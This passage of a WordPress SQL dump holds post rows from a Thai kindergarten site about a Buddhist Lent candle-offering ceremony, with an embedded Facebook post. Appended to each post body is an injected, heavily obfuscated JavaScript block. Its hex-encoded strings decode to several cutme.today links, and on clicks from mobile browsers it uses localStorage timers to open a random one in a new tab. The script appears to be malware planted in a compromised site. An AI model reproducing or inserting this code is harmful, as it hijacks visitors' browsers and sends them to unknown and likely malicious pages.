_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-29 18:41:27','2024-07-29 11:41:27','',19,'http://watprato.ssk.in.th/?p=103',0,'revision','',0),
(104,1,'2024-07-29 18:43:42','2024-07-29 11:43:42','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3Dpfbid02MK7veACUsd7sLcwzzGfPUX6G5um1e5mZMYWvVPk4iSZ8LbVJ93puz2UPab1AbgzCl%26id%3D61556083436494&show_text=true&width=500\" width=\"500\" height=\"736\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโต นำโดยคณะผู้บริหาร คณะครู และบุคลากรทางการศึกษา และนักเรียน  ร่วมกิจกรรมวันสำคัญทางศาสนา ถวายเทียนพรรษา ณ วัดมหาพุทธาราม (วัดพระโต) เนื่องในวันอาสาฬหบูชาและวันเข้าพรรษา','','publish','open','open','','%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%9a%e0%b8%b2%e0%b8%a5%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b9%82%e0%b8%95-3','','','2024-07-29 18:43:44','2024-07-29 11:43:44','',0,'http://watprato.ssk.in.th/?p=104',0,'post','',0),
(105,1,'2024-07-29 18:43:31','2024-07-29 11:43:31','','451952522_122164263800202781_1861607146297179774_n','','inherit','open','closed','','451952522_122164263800202781_1861607146297179774_n','','','2024-07-29 18:43:31','2024-07-29 11:43:31','',104,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/451952522_122164263800202781_1861607146297179774_n.jpg',0,'attachment','image/jpeg',0),
(106,1,'2024-07-29 18:43:42','2024-07-29 11:43:42','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3Dpfbid02MK7veACUsd7sLcwzzGfPUX6G5um1e5mZMYWvVPk4iSZ8LbVJ93puz2UPab1AbgzCl%26id%3D61556083436494&show_text=true&width=500\" width=\"500\" height=\"736\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโต นำโดยคณะผู้บริหาร คณะครู และบุคลากรทางการศึกษา และนักเรียน  ร่วมกิจกรรมวันสำคัญทางศาสนา ถวายเทียนพรรษา ณ วัดมหาพุทธาราม (วัดพระโต) 